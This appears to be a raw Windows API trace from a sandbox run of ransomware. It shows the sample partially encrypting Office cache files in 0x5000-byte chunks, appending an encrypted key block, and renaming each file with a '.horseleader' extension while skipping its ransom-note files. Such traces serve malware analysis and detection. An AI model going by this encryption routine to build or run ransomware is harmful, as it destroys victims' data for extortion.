[0217.375] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0217.376] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0217.376] StrStrW (lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0217.376] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1992192) returned 1 [0217.377] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.377] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0217.414] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0217.414] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0217.415] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf0b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.415] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0217.422] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0xffffffff) returned 1 [0217.422] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0217.422] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1e1600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.422] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0218.742] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0218.742] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0218.742] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.742] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0218.743] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0218.743] CloseHandle (hObject=0x21c) returned 1 [0218.743] GetProcessHeap () returned 0x780000 [0218.744] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0218.744] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader") returned 93 [0218.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.horseleader")) returned 1 [0218.752] GetProcessHeap () returned 0x780000 [0218.752] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0218.753] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0218.753] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0218.753] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0218.753] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".horseleader") returned 0x0 [0218.753] lstrcmpW (lpString1="Office32WW.xml", lpString2="#Decrypt#.txt") returned 1 [0218.753] lstrcmpW (lpString1="Office32WW.xml", lpString2="_uninstalling_.png") returned 1 [0218.753] lstrlenW (lpString=".testttjffg") returned 11 [0218.753] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpSrch=".testttjffg") 
returned 0x0 [0218.753] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0218.753] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0218.753] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0218.754] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0218.754] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0218.754] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=4274) returned 1 [0218.754] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0218.761] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0218.762] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0218.782] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.283] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, 
lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.283] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.283] CloseHandle (hObject=0x21c) returned 1 [0219.283] GetProcessHeap () returned 0x780000 [0219.283] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.284] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader") returned 93 [0219.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.horseleader")) returned 1 [0219.288] GetProcessHeap () returned 0x780000 [0219.289] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.289] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0219.289] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0219.289] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0219.289] StrStrIW (lpFirst="ose.exe", lpSrch=".horseleader") returned 0x0 [0219.289] lstrcmpW (lpString1="ose.exe", lpString2="#Decrypt#.txt") returned 1 [0219.289] lstrcmpW (lpString1="ose.exe", lpString2="_uninstalling_.png") returned 1 [0219.289] lstrlenW (lpString=".testttjffg") returned 11 [0219.289] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe", lpSrch=".testttjffg") returned 0x0 [0219.289] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.289] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.289] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.300] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0219.301] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0219.301] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=174440) returned 1 [0219.301] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.301] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.312] SetFilePointerEx (in: hFile=0x21c, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.312] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.313] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12cb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.313] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.313] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.314] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.314] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25968, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.314] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.316] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.316] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.316] SetFilePointerEx (in: hFile=0x21c, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.316] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.316] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.316] CloseHandle (hObject=0x21c) returned 1 [0219.317] GetProcessHeap () returned 0x780000 [0219.317] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.317] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader") returned 86 [0219.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.horseleader")) returned 1 [0219.318] GetProcessHeap () returned 0x780000 [0219.318] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.318] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xdded3805, 
dwReserved1=0xda7b4a6d, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0219.318] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0219.318] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0219.318] StrStrIW (lpFirst="osetup.dll", lpSrch=".horseleader") returned 0x0 [0219.318] lstrcmpW (lpString1="osetup.dll", lpString2="#Decrypt#.txt") returned 1 [0219.318] lstrcmpW (lpString1="osetup.dll", lpString2="_uninstalling_.png") returned 1 [0219.318] lstrlenW (lpString=".testttjffg") returned 11 [0219.318] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll", lpSrch=".testttjffg") returned 0x0 [0219.318] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.318] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.319] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.323] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0219.323] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0219.323] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=7378792) returned 1 [0219.323] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.323] ReadFile (in: 
hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.326] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.327] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.328] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3823b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.328] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.374] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.374] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.375] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x704768, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.375] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.381] WriteFile (in: hFile=0x21c, 
lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.381] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.381] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.381] CloseHandle (hObject=0x21c) returned 1 [0219.382] GetProcessHeap () returned 0x780000 [0219.382] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.382] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader") returned 89 [0219.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.horseleader")) returned 1 [0219.383] GetProcessHeap () returned 0x780000 [0219.383] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.383] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, 
ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0219.383] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0219.383] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0219.383] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".horseleader") returned 0x0 [0219.383] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="#Decrypt#.txt") returned 1 [0219.383] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="_uninstalling_.png") returned 1 [0219.383] lstrlenW (lpString=".testttjffg") returned 11 [0219.383] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpSrch=".testttjffg") returned 0x0 [0219.383] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.384] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.384] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.384] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0219.387] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") 
